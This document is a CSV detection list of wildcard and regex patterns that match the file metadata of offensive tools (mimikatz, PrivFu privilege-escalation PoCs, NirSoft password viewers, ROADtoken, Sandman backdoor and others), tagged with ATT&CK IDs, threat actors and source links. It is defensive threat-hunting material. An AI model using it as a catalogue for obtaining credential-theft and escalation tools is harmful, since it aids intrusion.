"*>MDE_Enum<*",".{0,1000}\>MDE_Enum\<.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","20438"
"*>mimikatz for Windows<*",".{0,1000}\>mimikatz\sfor\sWindows\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20447"
"*>mimikatz.exe<*",".{0,1000}\>mimikatz\.exe\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20448"
"*>mimilib.dll<*",".{0,1000}\>mimilib\.dll\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20449"
"*>mimilove for Windows 2000<*",".{0,1000}\>mimilove\sfor\sWindows\s2000\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20450"
"*>mimilove<*",".{0,1000}\>mimilove\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20451"
"*>mimispool.dll<*",".{0,1000}\>mimispool\.dll\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20452"
"*>NamedPipeImpersonation<*",".{0,1000}\>NamedPipeImpersonation\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20454"
"*>NoPowerShell<*",".{0,1000}\>NoPowerShell\<.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20462"
"*>NoPowerShell<*",".{0,1000}\>NoPowerShell\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20463"
"*>Nsocks.dll<*",".{0,1000}\>Nsocks\.dll\<.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#originalfilename","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","20464"
"*>Nsocks<*",".{0,1000}\>Nsocks\<.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#productname","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","20465"
"*>Obfuscar Console Utility<*",".{0,1000}\>Obfuscar\sConsole\sUtility\<.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","20466"
"*>OperaPassView<*",".{0,1000}\>OperaPassView\<.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20468"
"*>PassTheCert<*",".{0,1000}\>PassTheCert\<.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20469"
"*>PassTheCert<*",".{0,1000}\>PassTheCert\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20470"
"*>Password Recovery for Remote Desktop<*",".{0,1000}\>Password\sRecovery\sfor\sRemote\sDesktop\<.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","20471"
"*>Password Sniffer<*",".{0,1000}\>Password\sSniffer\<.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A","20472"
"*>PasswordFox<*",".{0,1000}\>PasswordFox\<.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20473"
"*>PasswordHashesView<*",".{0,1000}\>PasswordHashesView\<.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","0","#productname","N/A","10","9","N/A","N/A","N/A","N/A","20474"
"*>Password-Recovery For Firefox<*",".{0,1000}\>Password\-Recovery\sFor\sFirefox\<.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#Description","N/A","10","10","N/A","N/A","N/A","N/A","20475"
"*>Penetration test tool<*",".{0,1000}\>Penetration\stest\stool\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20478"
"*>physmem2profit<*",".{0,1000}\>physmem2profit\<.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#servicename","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","20479"
"*>PowerShdll<*",".{0,1000}\>PowerShdll\<.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","20482"
"*>PrintSpoofer<*",".{0,1000}\>PrintSpoofer\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20483"
"*>PWDumpX Service<*",".{0,1000}\>PWDumpX\sService\<.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#servicename","N/A","10","8","N/A","N/A","N/A","N/A","20488"
"*>pwnlook35<*",".{0,1000}\>pwnlook35\<.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#companyname","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","20489"
"*>RDP Recognizer<*",".{0,1000}\>RDP\sRecognizer\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20493"
"*>RegHiveBackup<*",".{0,1000}\>RegHiveBackup\<.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20495"
"*>Remote Desktop PassView<*",".{0,1000}\>Remote\sDesktop\sPassView\<.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A","20497"
"*>REPLACE_ME_DummyServiceName<*",".{0,1000}\>REPLACE_ME_DummyServiceName\<.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#servicename","Service Name https://github.com/Pennyw0rth/NetExec/blob/b855dac2b696ea1b744f10a0573c6b394670a5cb/nxc/data/keepass_trigger_module/RestartKeePass.ps1#L4","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","20502"
"*>RestoreServiceModificationVariant<*",".{0,1000}\>RestoreServiceModificationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20504"
"*>ROADToken.exe<*",".{0,1000}\>ROADToken\.exe\<.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#originalfilename","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20506"
"*>ROADToken<*",".{0,1000}\>ROADToken\<.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#productname","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20507"
"*>Router Scan by Stas'M<*",".{0,1000}\>Router\sScan\sby\sStas\'M\<.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","20508"
"*>RouterPassView<*",".{0,1000}\>RouterPassView\<.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20509"
"*>S4uDelegator<*",".{0,1000}\>S4uDelegator\<.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20511"
"*>S4ULogonShell<*",".{0,1000}\>S4ULogonShell\<.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20512"
"*>SafetyKatz<*",".{0,1000}\>SafetyKatz\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20513"
"*>SandmanBackdoorTimeProvider<*",".{0,1000}\>SandmanBackdoorTimeProvider\<.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#productname","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20514"
"*>Seatbelt<*",".{0,1000}\>Seatbelt\<.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#productname","fp risks","8","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","20516"
"*>SeAuditPrivilegePoC<*",".{0,1000}\>SeAuditPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20517"
"*>SeBackupPrivilegePoC<*",".{0,1000}\>SeBackupPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20518"
"*>SecondaryLogonVariant<*",".{0,1000}\>SecondaryLogonVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20519"
"*>SeCreatePagefilePrivilegePoC<*",".{0,1000}\>SeCreatePagefilePrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20520"
"*>SeCreateTokenPrivilegePoC<*",".{0,1000}\>SeCreateTokenPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20521"
"*>SeDebugPrivilegePoC<*",".{0,1000}\>SeDebugPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20522"
"*>SeRestorePrivilegePoC<*",".{0,1000}\>SeRestorePrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20523"
"*>SeSecurityPrivilegePoC<*",".{0,1000}\>SeSecurityPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20524"
